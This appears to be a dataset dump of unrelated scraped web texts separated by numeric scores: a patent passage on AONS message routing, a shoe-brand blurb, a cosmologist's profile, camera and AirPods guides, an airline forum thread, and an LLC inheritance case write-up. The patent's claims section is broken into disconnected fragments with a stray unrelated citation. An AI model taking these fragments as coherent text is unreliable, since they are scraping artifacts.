the message to receiving application 1504. At circumscribed numeral 9, AEP SP 1510 sends a reliable messaging (RM) acknowledgement (ACK) to AONS router 1508. At circumscribed numeral 10, AONS router 1508 receives the RM ACK and sends the RM ACK to AEP CP 1506. At circumscribed numeral 11, AEP CP 1506 receives the RM ACK and, in response, deletes the copy of the message that is stored in data store 1512. Because the delivery of the message has been acknowledged, there is no further need to store a copy of the message in data store 1512. Alternatively, if AEP CP 1506 does not receive the RM ACK within a specified period of time, then AEP CP 1506 resends the message. Referring to FIG. 15B, at circumscribed numeral 12, receiving application 1504 sends a response message toward sending application 1502. At circumscribed numeral 13, AEP SP 1510 intercepts the message and adds an AONP header to the message, forming an AONP message. At circumscribed numeral 14, AEP SP 1510 sends the AONP message to AONS router 1508. At circumscribed numeral 15, AONS router 1508 receives the AONP message. At circumscribed numeral 16, AONS router 1508 sends the AONP message to AEP CP 1506. At circumscribed numeral 17, AEP CP 1506 receives the AONP message and removes the AONP header from the message, thus decapsulating the message. At circumscribed numeral 18, AEP CP 1506 sends the message to sending application 1502. FIG. 16 is a diagram that illustrates a one-way message flow with reliable message delivery. At circumscribed numeral 1, a sending application 1602 sends a message towards a receiving application 1604. At circumscribed numeral 2, an AEP CP 1606 intercepts the message and adds an AONP header to the message, forming an AONP message. At circumscribed numeral 3, AEP CP 1606 saves the message to a data store 1612. Thus, if there are any problems with sending the message, AEP CP 1606 can resend the copy of the message that is stored in data store 1612. At circumscribed numeral 4, AEP CP 1606 sends an ACK (acknowledgement) back to sending application 1602. At circumscribed numeral 5, AEP CP 1606 sends the AONP message to an AONS router 1608. At circumscribed numeral 6, AONS router 1608 receives the AONP message. At circumscribed numeral 7, AONS router 1608 sends the AONP message to an AEP SP 1610. At circumscribed numeral 8, AEP SP 1610 receives the AONP message and removes the AONP header from the message, thus decapsulating the message. At circumscribed numeral 9, AEP SP 1610 sends the message to receiving application 1604. At circumscribed numeral 10, AEP SP 1610 sends a reliable messaging (RM) acknowledgement (ACK) to AONS router 1608. At circumscribed numeral 11, AONS router 1608 receives the RM ACK and sends the RM ACK to AEP CP 1606. At circumscribed numeral 12, AEP CP 1606 receives the RM ACK and, in response, deletes the copy of the message that is stored in data store 1612. Because the delivery of the message has been acknowledged, there is no further need to store a copy of the message in data store 1612. Alternatively, if AEP CP 1606 does not receive the RM ACK within a specified period of time, then AEP CP 1606 resends the message. FIG. 17 is a diagram that illustrates synchronous request and response messages. At circumscribed numeral 1, an AONS node 1704 receives, from a client 1702, a request message, in either implicit or explicit mode. At circumscribed numeral 2, AONS node 1704 reads the message, selects and executes a flow, and adds an AONP header to the message. At circumscribed numeral 3, AONS node 1704 sends the message to a next hop node, AONS node 1706. At circumscribed numeral 4, AONS node 1706 reads the message, selects and executes a flow, and removes the AONP header from the message, formatting the message according to the message format expected by a server 1708. At circumscribed numeral 5, AONS node 1706 sends the message to the message's destination, server 1708. At circumscribed numeral 6, AONS node 1706 receives a response message from server 1708 on the same connection on which AONS node 1706 sent the request message. At circumscribed numeral 7, AONS node 1706 reads the message, correlates the message with the request message, executes a flow, and adds an AONP header to the message. At circumscribed numeral 8, AONS node 1706 sends the message to AONS node 1704. At circumscribed numeral 9, AONS node 1704 reads the message, correlates the message with the request message, executes a flow, and removes the AONP header from the message, formatting the message according to the message format expected by client 1702. At circumscribed numeral 10, AONS node 1704 sends the message to client 1702 on the same connection on which client 1702 sent the request message to AONS node 1704. FIG. 18 is a diagram that illustrates a sample one-way end-to-end message flow. At circumscribed numeral 1, an AONS node 1804 receives, from a client 1802, a request message, in either implicit or explicit mode. At circumscribed numeral 2, AONS node 1804 reads the message, selects and executes a flow, and adds an AONP header to the message. At circumscribed numeral 3, AONS node 1804 sends an acknowledgement to client 1802. At circumscribed numeral 4, AONS node 1804 sends the message to a next hop node, AONS node 1806. At circumscribed numeral 5, AONS node 1806 reads the message, selects and executes a flow, and removes the AONP header from the message, formatting the message according to the message format expected by a server 1808. At circumscribed numeral 6, AONS node 1806 sends the message to the message's destination, server 1808. According to the node view, the message lifecycle within an AONS node, involves ingress/egress processing, message processing, message execution control, and flow execution. FIG. 19 is a diagram that illustrates message-processing modules within an AONS node 1900. AONS node 1900 comprises an AONS message execution controller (AMEC) framework 1902, a policy management subsystem 1904, an AONS message processing infrastructure subsystem 1906, and an AOSS 1908. AMEC framework 1902 comprises a flow management subsystem 1910, a bladelet™ execution subsystem 1912, and a message execution controller 1914. Policy management subsystem 1904 communicates with flow management subsystem 1910. AOSS 1908 communicates with bladelet™ execution subsystem 1912 and AONS message processing infrastructure subsystem 1906. AONS message processing infrastructure subsystem 1906 communicates with message execution controller 1914. Flow management subsystem 1910, bladelet™ execution subsystem, and message execution controller 1914 all communicate with each other. FIG. 20 is a diagram that illustrates message processing within AONS node 1900. AMEC framework 1902 is an event-based multi-threaded mechanism to maximize throughput while minimizing latency for messages in the AONS node. According to one embodiment, received packets are re-directed, TCP termination is performed, SSL termination is performed if needed, Layer 5 protocol adapter and access method processing is performed (using access methods such as HTTP, SMTP, FTP, JMS/MQ, JMS/RV, JDBC, etc.), AONS messages (normalized message format for internal AONS processing) are formed, messages are queued, messages are dequeued based on processing thread availability, a flow (or rule) is selected, the selected flow is executed, the message is forwarded to the message's destination, and for request/response-based semantics, responses are handled via connection/session state maintained within AMEC framework 1902. In one embodiment, executing the flow comprises executing each step (i.e., bladelet™/action) of the flow. If a bladelet™ is to be run within a separate context, then AMEC framework 1902 may enqueue into bladelet™-specific queues, and, based on thread availability, dequeue appropriate bladelet™ states from each bladelet™ queue. According to one embodiment, flows string together bladelets™ (i.e., actions) to customize message processing logic. Scriptlets™ provide a mechanism for customers and partners to customize or extend native AONS functionality. Some bladelets™ and services may be provided with an AONS node. As mentioned in the previous section, a set of core services may be provided by AONS to form the underlying foundation of value-added functionality that can be delivered via an AONS node. In one embodiment, these include: Security Services, Standard Compression Services, Delta Compression Services, Caching Service, Message Logging Service, Policy Management Service (Policy Manager), Reliable Messaging Service, Publish/Subscribe Service, Activity Monitoring Service, Message Distribution Service, XML Parsing Service, XSLT Transformation Service, and QoS Management Service. In one embodiment, each AONS core service is implemented within the context of a service framework. In one embodiment, an AONS node is provisioned and configured for a class of application messages, where it enforces the policies that are declaratively defined on behalf- of the application end-points, business-domains, security-domains, administrative domains, and network-domains. Furthermore, the AONS node promotes flexible composition and customization of different product functional features by means of configurability and extensibility of different software and hardware sub-systems for a given deployment scenario. Due to the application and network embodiments of the AONS functionality, the AONS architecture framework should effectively and uniformly address different aspects of configurability, manageability, and monitorability of the various system components and their environments. The AONS Configuration and Management framework is based upon five functional areas ("FCAPS") for network management as recommended by the ISO network management forum. The functional areas include fault management, configuration management, accounting management, performance management, and security management. Fault management is the process of discovering, isolating, and fixing the problems or faults in the AONS nodes. Configuration management is the process of finding and setting up the AONS nodes. Accounting management involves tracking usage and utilization of AONS resources to facilitate their proper usage. Performance management is the process of measuring the performance of the AONS system components and the overall system. Security management controls access to information on the AONS system. Much of the above functionality is handled via proper instrumentation, programming interfaces, and tools as part of the overall AONS solution. FIG. 21, FIG. 22, and FIG. 23 are diagrams that illustrate entities within an AONS configuration and management framework. A configuring and provisioning server (CPS) is the centralized hub for configuration and management of AONS policies, flows, scriptlets™ and other manageable entities. Configurable data is pushed to the CPS from an AONS design studio (flow tool) and the AONS admin may then provision this data to the production deployment. A promotion process is also provided to test and validate changes via a development to staging/certification to production rollout process. A configuration and provisioning agent (CPA) resides on individual AONS blades and provides the local control and dispatch capabilities for AONS. The CPA interacts with the CPS to get updates. The CPA takes appropriate actions to implement changes. The CPA is also used for collecting monitoring data to report to third party consoles. In one embodiment, AONS is instrumented to support well-defined events for appropriate monitoring and visibility into internal processing activities. The monitoring of AONS nodes may be accomplished via a pre-defined JMX MBean agent that is running on each AONS node. This agent communicates with a remote JMX MBean server on the PC complex. An AONS MIB is leveraged for SNMP integration to third party consoles. FIG. 24 is a diagram that illustrates an AONS monitoring architecture. In one embodiment, the following tool sets are provided for various functional needs of AONS: a design studio, an admin studio, and a message log viewer. The design studio is a visual tool for designing flows and applying message classification and mapping policies. The admin studio is a web-based interface to perform all administration and configuration functions. The message log viewer is a visual interface to analyze message traffic, patterns, and trace information. FIG. 5 is a block diagram that illustrates a computer system 500 upon which an embodiment of the invention may be implemented. The preferred embodiment is implemented using one or more computer programs running on a network element such as a proxy device. Thus, in this embodiment, the computer system 500 is a proxy device such as a load balancer. Computer system 500 includes a bus 502 or other communication mechanism for communicating information, and a processor 504 coupled with bus 502 for processing information. Computer system 500 also includes a main memory 506, such as a random access memory (RAM), flash memory, or other dynamic storage device, coupled to bus 502 for storing information and instructions to be executed by processor 504. Main memory 506 also may be used for storing temporary variables or other intermediate information during execution of instructions to be executed by processor 504. Computer system 500 further includes a read only memory (ROM) 508 or other static storage device coupled to bus 502 for storing static information and instructions for processor 504. A storage device 510, such as a magnetic disk, flash memory or optical disk, is provided and coupled to bus 502 for storing information and instructions. A communication interface 518 may be coupled to bus 502 for communicating information and command selections to processor 504. Interface 518 is a conventional serial interface such as an RS-232 or RS-322 interface. An external terminal 512 or other computer system connects to the computer system 500 and provides commands to it using the interface 514. Firmware or software running in the computer system 500 provides a terminal interface or character-based command interface so that external commands can be given to the computer system. A switching system 516 is coupled to bus 502 and has an input interface 514 and an output interface 519 to one or more external network elements. The external network elements may include a local network 522 coupled to one or more hosts 524, or a global network such as Internet 528 having one or more servers 530. The switching system 516 switches information traffic arriving on input interface 514 to output interface 519 according to pre-determined protocols and conventions that are well known. For example, switching system 516, in cooperation with processor 504, can determine a destination of a packet of data arriving on input interface 514 and send it to the correct destination using output interface 519. The destinations may include host 524, server 530, other end stations, or other routing and switching devices in local network 522 or Internet 528. The invention is related to the use of computer system 500 for avoiding the storage of client state on computer system 500. According to one embodiment of the invention, computer system 500 provides for such updating in response to processor 504 executing one or more sequences of one or more instructions contained in main memory 506. Such instructions may be read into main memory 506 from another computer-readable medium, such as storage device 510. Execution of the sequences of instructions contained in main memory 506 causes processor 504 to perform the process steps described herein. One or more processors in a multi-processing arrangement may also be employed to execute the sequences of instructions contained in main memory 506. In alternative embodiments, hardwired circuitry may be used in place of or in combination with software instructions to implement the invention. Thus, embodiments of the invention are not limited to any specific combination of hardware circuitry and software. The term "computer-readable medium" as used herein refers to any medium that participates in providing instructions to processor 504 for execution. Such a medium may take many forms, including but not limited to, non-volatile media, volatile media, and transmission media. Non-volatile media includes, for example, optical or magnetic disks, such as storage device 510. Volatile media includes dynamic memory, such as main memory 506. Transmission media includes coaxial cables, copper wire and fiber optics, including the wires that comprise bus 502. Transmission media can also take the form of acoustic or light waves, such as those generated during radio wave and infrared data communications. Various forms of computer readable media may be involved in carrying one or more sequences of one or more instructions to processor 504 for execution. For example, the instructions may initially be carried on a magnetic disk of a remote computer. The remote computer can load the instructions into its dynamic memory and send the instructions over a telephone line using a modem. A modem local to computer system 500 can receive the data on the telephone line and use an infrared transmitter to convert the data to an infrared signal. An infrared detector coupled to bus 502 can receive the data carried in the infrared signal and place the data on bus 502. Bus 502 carries the data to main memory 506, from which processor 504 retrieves and executes the instructions. The instructions received by main memory 506 may optionally be stored on storage device 510 either before or after execution by processor 504. Communication interface 518 also provides a two-way data communication coupling to a network link 520 that is connected to a local network 522. For example, communication interface 518 may be an integrated services digital network (ISDN) card or a modem to provide a data communication connection to a corresponding type of telephone line. As another example, communication interface 518 may be a local area network (LAN) card to provide a data communication connection to a compatible LAN. Wireless links may also be implemented. In any such implementation, communication interface 518 sends and receives electrical, electromagnetic or optical signals that carry digital data streams representing various types of information. Network link 520 typically provides data communication through one or more networks to other data devices. For example, network link 520 may provide a connection through local network 522 to a host computer 524 or to data equipment operated by an Internet Service Provider (ISP) 526. ISP 526 in turn provides data communication services through the worldwide packet data communication network now commonly referred to as the "Internet" 528. Local network 522 and Internet 528 both use electrical, electromagnetic or optical signals that carry digital data streams. The signals through the various networks and the signals on network link 520 and through communication interface 518, which carry the digital data to and from computer system 500, are exemplary forms of carrier waves transporting the information. Computer system 500 can send messages and receive data, including program code, through the network(s), network link 520 and communication interface 518. In the Internet example, a server 530 might transmit a requested code for an application program through Internet 528, ISP 526, local network 522 and communication interface 518. In accordance with the invention, one such downloaded application provides for avoiding the storage of client state on a server as described herein. Processor 504 may execute the received code as it is received and/or stored in storage device 510 or other non-volatile storage for later execution. In this manner, computer system 500 may obtain application code in the form of a carrier wave. In the foregoing specification, the invention has been described with reference to specific embodiments thereof. The specification and drawings are, accordingly, to be regarded in an illustrative rather than a restrictive sense. sending (218) the same first application layer message toward the second server. sending the second application layer message toward the second server. A method as recited in Claim 1, wherein the one or more first data packets are destined for an application that is hosted on a device other than the network element. A method as recited in Claim 1, wherein the network element is a network router. in response to determining that the subset is empty, selecting, from the subset of servers, a server that has a lowest average outstanding request wait time of the average outstanding request wait times of the servers in the subset of servers. selecting a server that is associated with the session identifier. wherein determining the session identifier comprises locating the session identifier at the XML hierarchy path that is associated with the first set of criteria. a decision unit that is configured to carry out a method according to any preceding claim. a network element comprising an apparatus according to claim 8. US699842A (en) * 1902-02-18 1902-05-13 Chicago Railway Equipment Co Reversible guard-finger clamp for brake-beams.
0.93538
Which global brands make large shoes for men? It wasn’t so long ago that the majority of men’s shoe brands only offered footwear up to a size 12. But with foot size increasing at an average of two sizes over the last four decades, many of the major brands now make large shoes for men up to a size 14 and beyond. Nike is one of those brands. Founded in the United States in 1964, their mission is to bring inspiration and innovation to every athlete in the world. Nike is one of the world’s most popular shoe brands. With their famous tagline ‘Just do it’ and iconic swoosh logo, their performance and lifestyle sneakers have created a culture of its own. Vans is another global brand that now caters for men with bigger feet. Based in California, it’s known for its skateboarding shoes and sponsors a variety of skate, snowboarding and BMX teams. Vans has come a long way since it started trading in 1966 when it sold just 12 pairs of shoes on its first day. A more formal footwear brand, selling larger sizes, is Barker shoes. They have been an English tradition for over 135 years. Only the most carefully selected leathers are used, and the uppers are shaped on the last by hand. Many other traditional shoemaking methods are still employed including slow natural drying and polishing. Barker have been making shoes in the Northamptonshire village of Earls Barton since 1880.
0.999937
PhD students who wish to be supervised by Perimeter Institute faculty normally apply through the PSI program. To apply directly to a PhD program, students should submit an application to the Physics and Astronomy Department at the University of Waterloo. Students interested in pursuing an MSc degree should apply to Perimeter Institute's PSI program. I am a "data-oriented" cosmologist: my work is a mixture of theoretical physics, phenomenology, computational physics, statistics, and data analysis. I have been a member of several large experiments, including the WMAP and Planck cosmic microwave background (CMB) satellites. Most recently, I have joined CHIME, a new experiment in British Columbia which aims to measure the radio sky to orders of magnitude better sensitivity than previous all-sky surveys, with a wide variety of applications. It is the first new Canadian research telescope in several decades. My best-known work is on CMB data analysis and phenomenology, including a classification of observable signals from self-interactions of the inflaton, and the first detection of gravitational lensing in the CMB. Recently, I have been interested in new data analysis techniques for large scale structure and radio astronomy. 2018: I was co-awarded (with the rest of the WMAP Science Team) the Breakthrough Prize in Fundamental Physics, which recognizes physicists who have made ``profound contributions to human knowledge''. 2012: I was co-awarded (with the rest of the WMAP Science Team) the Gruber Cosmology Prize, an international prize given once per year to an individual or team ``whose groundbreaking work provides new models that inspire and enable fundamental shifts in knowledge and culture''. 2009: Spitzer Postdoctoral Fellowship at Princeton University, awarded once per year to ``a top theoretical postdoctoral astronomer''. 2007: STFC (UK Science and Technology Facilities Council) Postdoctoral Fellowship, awarded to twelve recent PhDs (across all scientific fields) to pursue postdoctoral research in the UK. 2006: Bloomenthal Fellowship, awarded once per year to ``the best graduate student in theoretical physics with advanced residency status'' at the University of Chicago. 2002: McCormick Doctoral Fellowship, awarded to ``the highest rated applicants to the Ph.D. program of the Department of Physics'' at the University of Chicago. CHIMEFRB collaboration, ``The CHIME Fast Radio Burst Project: System Overview'', ApJ (2018) 863, 1. W. Coulton, R. Armstrong, K. Smith, R. Lupton, D. Spergel, ``Exploring the brighter-fatter effect with the Hyper Suprime-Cam'', ApJ (2018) 155, 6. C. Ng, K. Vanderlinde, A. Paradise, P. Klages, K. Masui, K. Smith, K. Bandura, P. J. Boyle, M. Dobbs, V. Kaspi, A. Renard, J. R. Shaw, I. Stairs, I. Tretyakov, ``CHIME FRB: An application of FFT beamforming for a radio telescope'', URSI GASS 32 (2017). CHIME collaboration, "Limits on the ultra-bright Fast Radio Burst population from the CHIME pathfinder", ApJ (2017) 844, 161. P. Daniel Meerberg, J. Meyers, K. M. Smith, A. van Engelen, "Reconstructing CMB fluctuations and the mean reionization optical depth", PRD 95, 123538 (2017). P. Berger et al, ``Holographic Beam Mapping of the CHIME Pathfinder Array'', Proc. SPIE (2016), 9906. E. Schaan, S. Ferraro, M. Vargas-Magana, K. M. Smith et al, ``Evidence for the kinematic Sunyaev-Zeldovich effect with ACTPol and velocity reconstruction from BOSS'', PRD (2016) 93, 082002. L. Boyle, J. Y. Khoo, K. M. Smith, ``Symmetric Satellite Swarms and Choreographic Crystals'', PRL (2016) 116, 015503 (``Editors' Suggestion''). N. Denman et al, ``A GPU-based Correlator X-engine Implemented on the CHIME Pathfinder'', IEEE ASAP 2015. Planck collaboration, ``Planck 2015 results. XVII. Constraints on primordial non-Gaussianity'', arXiv: 1502.01592 [astro-ph], accepted for publication in Astronomy & Astrophysics. Planck collaboration, ``Planck 2015 results. I. Overview of products and scientific results'', arXiv: 1502.01582 [astro-ph], accepted for publication in Astronomy & Astrophysics. S. Ferraro, K. M. Smith, ``Using Large Scale Structure to Test Multifield Inflation'', PRD (2015) 91, 043506. L. Boyle, K. M. Smith, C. Dvorkin, N. Turok, ``On testing and extending the inflationary consistency relation for tensor modes'', PRD (2015) 92, 043504. S. R. Behbahani, M. Mirbabayi, L. Senatore, K. M. Smith, ``New natural shapes of non-Gaussianity from high-derivative interactions and their optimal limits from WMAP 9-year data'', JCAP (2014) 11 035. K. M. Smith, C. Dvorkin, L. Boyle, N. Turok, M. Halpern, G. Hinshaw, B. Gold, ``On quantifying and resolving the BICEP2/Planck tension over gravitational waves'', PRL (2014) 113, 031301 (``Editors' Suggestion''). A. Broderick, C. Pfrommer, E. Puchwein, P. Chang, K. M. Smith, ``Lower Limits upon the Anisotropy of the Extragalactic Gamma-Ray Background implied by the 2FGL and 1FHL Catalogs'', ApJ (2014) 796, 12. S. Ferraro, K. Smith, ``Characterizing the Epoch of Reionization with the small-scale CMB: constraints on the optical depth and physical parameters'', PRD submitted, arXiv: 1803.07036 [astro-ph]. C. Ng et al, "CHIME FRB: An application of FFT beamforming for a radio telescope", arXiv: 1702.04728 [astro-pg[. K. M. Smith, "New algorithms for radio pulsar search", arXiv: 1610.06831 [astro-ph]. K. M. Smith, L. Senatore, M. Zaldarriaga, ``Optimal analysis of the CMB trispectrum'', arXiv: 1502.00635 [astro-ph]. M. Alvarez et al, ``Testing Inflation with Large Scale Structure: Connecting Hopes with Reality'', Proceedings from workshop held at University of Toronto, October 2014. O. Dore et al, "WFIRST Science Investigation Team: Cosmology with the High Latitude Survey, Annual Report 2017". K. N. Abazajian et al, "Neutrino Physics from the Cosmic Microwave Background and Large Scale Structure", Report from the ``Dark Energy and CMB'' working group for the American Physical Society's Division of Particles and Fields long-term planning exercise ("Snowmass"). K. N. Abazajian et al, "Inflation Physics from the Cosmic Microwave Background and Large Scale Structure", Report from the ``Dark Energy and CMB'' working group for the American Physical Society's Division of Particles and Fields long-term planning exercise ("Snowmass"). ``CHIME: the Canadian Hydrogen Intensity Mapping Experiment'', invited conference talk, Brookhaven. ``CHIME: the Canadian Hydrogen Intensity Mapping Experiment'', invited seminar, Center for Computational Astronomy, NYC. ``CHIME: the Canadian Hydrogen Intensity Mapping Experiment'', invited seminar, Inst1itute for Advanced Study, Princeton. ``CHIME: the Canadian Hydrogen Intensity Mapping Experiment'', physics colloquium, University of Maryland. ``CHIME: the Canadian Hydrogen Intensity Mapping Experiment'', invited seminar, University of Toronto. ``Cosmology with the kinetic Sunyaev-Zeldovich Effect'', invited conference talk, Banff. ``Search algorithms for fast transients'', invited conference talk, Cape Town, South Africa. "Search algorithms for fast transients", invited conference talk, McGill University. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment", invited seminar, Brown University. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment", invited conference talk, Banff. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment", invited seminar, Jodrell Bank Observatory, UK. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment", invited seminar, Oxford University. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment", invited seminar, Center for Computational Astronomy, New York. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment", physics colloquium, Stony Brook University. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment", physics colloquium, University of Guelph. "Detecting patchy reionization in the CMB", invited conference talk, University of Chicago. "Detecting patchy reionization in the CMB", invited conference talk, Stony Brook. "CHIME: the Canadian Hydrogen Intensity Mapping Experiment'', invited seminar, IAS Princeton. "CHIME: forecasts and status update'', invited conference talk, IAS Princeton. "CHIME: forecasts and status update", invited seminar, Munich. "Planck constraints on primordial non-Gaussianity and future prospects", invited conference talk, Aspen. "Planck constraints on primordial non-Gaussianity and future prospects", invited seminar, CMU. "Planck constraints on primordial non-Gaussianity and future prospects", invited seminar, NYU. "Planck constraints on primordial non-Gaussianity and future prospects", invited seminar, Princeton. "Planck constraints on primordial non-Gaussianity and future prospects", invited conference talk, University of Minnesota. "Primordial non-Gaussianity in the CMB and large-scale structure", invited colloquium, McGill. "Primordial non-Gaussianity in the CMB and large-scale structure", invited seminar, University of Waterloo. "Primordial non-Gaussianity in the CMB and large-scale structure", invited seminar, UBC. "Non-Gaussianity post Planck and BICEP2", invited conference talk, Brookhaven. "Quantum mechanical simulations of inflation", invited conference talk, Princeton. "Quantum mechanical simulations of inflation", invited seminar, University of Toronto. "Primordial non-Gaussianity in the CMB and large-scale structure", invited conference talk, Stanford.
0.992783
Whats the best compact camera you can buy in 2018 that is small enough to fit inside a jacket pocket? We list 5 awesome pocket friendly cameras that can take high quality pictures and video. Most of them feature large 1.0" sensors meaning they will capture much better image quality than your smartphone but without the bulk of a large DSLR. Some cameras have large 15x zooms – great for travellers, others have flip up screens – great for vloggers, and one is rugged – great for adventure or growing families.
0.999999
First released in 2016, Apple's AirPods are widely regarded as one of the company's best products in recent years, with the AirPods offering great battery life, portability, simple charging, easy connectivity, and unparalleled Bluetooth range. AirPods are so popular that Apple still has trouble keeping them in stock at times, and two years after launch, it's not uncommon to see an abundance of AirPods out on the street, in movies, in TV shows, and everywhere else you look. If you're new to AirPods, considering buying a pair, or just want to pick up some new tips, this guide is for you. AirPods are Apple's completely wire-free headphones, which look a bit like the Apple EarPods from older devices, but without the cables. AirPods have Apple-designed tech inside like a special wireless chip called the W1 or H1 (depending on version), an accelerometer for gestures, dual optical sensors, dual beamforming microphones for Siri and phone calls, and a second accelerometer for speech detection. AirPods come with the AirPods Charging Case, which is used for both charging and storage purposes so the AirPods don't get lost. The Charging Case is about the size of a container of dental floss, so it's easily pocketable. A Lightning port at the bottom lets the AirPods and the case be charged with the Lightning cables you already have on hand, and the Wireless Charging Case lets you charge with a Qi wireless charger. How many versions of AirPods are there? The AirPods were first introduced in December 2016, and were refreshed in March 2019, so there are two versions of the AirPods: the original AirPods and the second-generation AirPods. Confusingly, both versions are called "AirPods," but there are some notable differences between them. The second-generation AirPods, or AirPods 2, have an updated H1 chip instead of a W1 chip. The H1 allows the AirPods to switch between your devices twice as fast, and connecting a phone call is 1.5x faster. The new AirPods have the same general battery life, but three hours of talk time instead of two. You won't see any design differences between AirPods 1 and AirPods 2 because they're identical. AirPods 2 support hands-free "Hey Siri" functionality so you can summon Apple's personal assistant without needing to tap, and most importantly, the new AirPods come with an optional Wireless Charging Case that allows them to be charged with any Qi wireless charging mat. AirPods 2 can be purchased with the Wireless Charging Case for $199, or with the standard case for $159 if you don't need wireless charging capabilities. If you have original AirPods, you can buy a separate Wireless Charging Case for $79 to add wireless charging capabilities. For more detail on the differences between the two versions of the AirPods, make sure to check out our New AirPods vs. Old AirPods guide. One of the best thing about AirPods is how easy they are to set up with an Apple device. All you need to do is unlock your iPhone or iPad, pop open the top of the AirPods Charging Case, hold it near your device, and wait for a popup on your iPhone or iPad's display. Your AirPods are linked to your iCloud account, so once you pair them with one device, your other devices know they exist. You can switch connections between your devices through the standard Bluetooth settings options, where AirPods will be listed on any device that you're signed into with your iCloud account. AirPods have a number of unique features when used on an Apple device, and they've been designed to work well with all of your Apple products. If you're considering AirPods you'll want to check out this list so you know just what makes them so special. These are all features that other headphone manufacturers have attempted to match, but haven't been able to get quite right in this combination. AirPods continue to be ahead of the competition, and they're almost universally loved by those who have Apple devices. With the above listed iPhone, Apple Watch, iPad, and Mac models, all AirPods features are available. You can pair AirPods with other non-Apple devices, you just won't get to take advantage of all the bells and whistles. If you have the second-generation AirPods and are using the AirPods with an Apple device, you need to have iOS 12.2, watchOS 5.2, or macOS 10.14.4 or later installed. We haven't seen complaints of AirPods falling out of peoples' ears with regular use, but it's worth noting that AirPods are not designed for exercising and can come out with rigorous activity. There are quite a few accessories on the market that you can get for your AirPods, including protective cases, cases that add wireless charging, and more. We've listed a handful of the best accessories we've found below. AirSnap from Twelve South ($30) - A handy little leather case for your AirPods, metal clip included for keeping them within reach in a bag. HyperJuice Wireless Adapter ($20) - The HyperJuice snaps onto your AirPods case and lets you charge your AirPods using a Qi wireless charging mat. PowerPod Wireless Charging Case ($30) - Another wireless charging case that's designed to fit over the AirPods Charging Case. Catalyst Waterproof AirPods Case ($25) - This silicone case fits over your AirPods Charging Case and keeps it safe from water or dust. It also includes a carabiner. Airfly from Twelve South ($40) - The Airfly is an adapter that lets you use AirPods where wired headphones would normally be required, such as at gyms or with airplane entertainment systems. Spigen AirPods Strap ($8.99) - If you want to add a cable to your AirPods for some reason, Spigen has you covered with a strap that connects them together. EarBuddyz Ear Hooks ($11.95) - If you want to get some ear hooks to help your AirPods stay in place, EarBuddyz offers a soft silicone option. We've done a couple of comparisons that pit the AirPods against other wire-free headphones. Spoiler: the AirPods are super popular for a reason and are the best wireless headphones we've found for Apple's devices. AirPods can be purchased from Apple for $199 to $159, depending on whether or not you choose a Wireless Charging Case, but third-party retailers sometimes have them available at a discounted price. For the best possible deal on AirPods, make sure to check out our AirPods deal guide. Apple is, of course, working on a third-generation version of the AirPods, and you can see all of the details in our AirPods rumor roundup. Rumors suggest we'll be seeing better water resistance, noise canceling technology, a new design, and more, with new AirPods set to launch in late 2019 or early 2020. AirPods - Yay or Nay?
0.950184
BA LHR-DOH-LHR daily cancellation since 13/11? From what I can tell the last LHR-DOH-LHR rotation was operated on 13/11. Since then every flight has been cancelled. Anyone know the reason? If it has been cancelled, I'd imagine if it's because of a sharp decline in passengers and revenue since the local problems started. And after all, they have QR as partners to carry the BA code. But, still، it would be a surprise. QR hubs through DOH, but BA depends on point-to-point traffic and passengers hubbing through LHR to Doha. I went twice in the last month: BA to Doha was very, VERY quiet, but mobbed coming back. DOH was routinely cancelled during the Mixed Fleet strike, due to the readily available flights with partner (and investor) QR. This time maybe it's because of equipment availability, although that does seem strange during the winter season. Various carriers incl BA and VS struggling with RR engine supply for 787. I think I saw VS using 747 to JFK as a result. I can't find the original post on this from a couple of weeks ago, but the route restarts today I think. There was some discussion around normalising crew hours, I don't know if that's correct or not. The BA122/123 rotation is currently pretty low yield in my experience, so it's probably the least worse option if something's got to give. I had the whole F cabin to myself on a recent segment a month or so ago. I can't find it either and I was the one who put it online! Yes, it's for flights from 14 to 19 November going out from London on BA123, and returning flights DOH-LHR 15 to 20 November on BA122 inclusive. Rebooking onto QR, unfortunately WTP gets downgraded to economy and passengers are invited to claim downgrade refund. It's OK to go direct if that is now appropriate, so CDG-LHR-DOH can be rebooked to CDG-DOH on QR. My suspicion is indeed they are trying to saving on cabin crew hours, if that is the case then there will typically be more low-level cancellations as crew hours creep up to the 900 hrs limit. However the official reason is "operational reasons", which is fairly close to meaningless. I got upgraded to QR during the strike and travel with them all the time now! I have been cancelled on the BA 122 on the 3rd. I guess I'll post the questions in the EC261 thread! British Airways have cancelled the LHR-DOH BA123 from 1-13 December and DOH-LHR BA122 from 2-14 December, with a re-protection agreement available on Qatar Airways (QR). OK - I couldn't find this so thanks. Can I change the ticket onto a QR A380?
0.999999
If you specify a transfer of LLC membership interest upon death but promise the same property to someone else in your revocable trust, who wins? In addition to providing a managerial framework, the agreement imposed restrictions upon each Member’s ability to convey his interest in the company. In the case of death of a Member, the agreement provided that, unless (i) a Member shall transfer all or a portion of his LLC Membership Interest to a member of his immediate family, (ii) a Member bequeaths the Membership Interest in the Member’s last will and testament to members of the immediate family of the Member, or (iii) all such Membership Interest of a deceased Member are inherited by members of the Member’s immediate family, the LLC Membership Interest shall pass to and immediately vest in the deceased Member’s then living children. On December 12, 2000, Bertram executed his last will and testament and The Bertram Blechman Revocable Living Trust. Neither the will, nor the trust, contained any provision relating to Bertram’s 50% ownership interest in the LLC. However, on August 20, 2010, Bertram amended his trust to provide a “specific gift” of his residence and one half of the distributions from the LLC, to a trustee for the benefit of Arlene Roogow—Bertram’s girlfriend since 2003. The trust also required the Estate to pay the expenses associated with maintenance of the home. On February 25, 2011, Bertram died. Predictably, Ms. Roogow asked the probate court to award her the residence and to transfer the LLC’s distributions from the Estate account to her own account to pay her expenses associated with the residence, pursuant to the 2010 trust amendment. Bertram’s children, however, took the position that the LLC membership and its distributions were not an estate asset, because upon Bertram’s death his 50% interest in the LLC immediately vested in them, as his children. Ms. Roogow countered that the specific devise in the 2010 trust amendment controlled, and she was therefore entitled to the distributions. The probate court sided with Ms. Roogow and held that the LLC was an estate asset, and as a result, Ms. Roogow was entitled to receive one-half of the distributions from the LLC. The children appealed. The Florida Fourth District Court of Appeal disagreed with the probate court and reversed. The appellate court held that under Florida law the express language in contracts 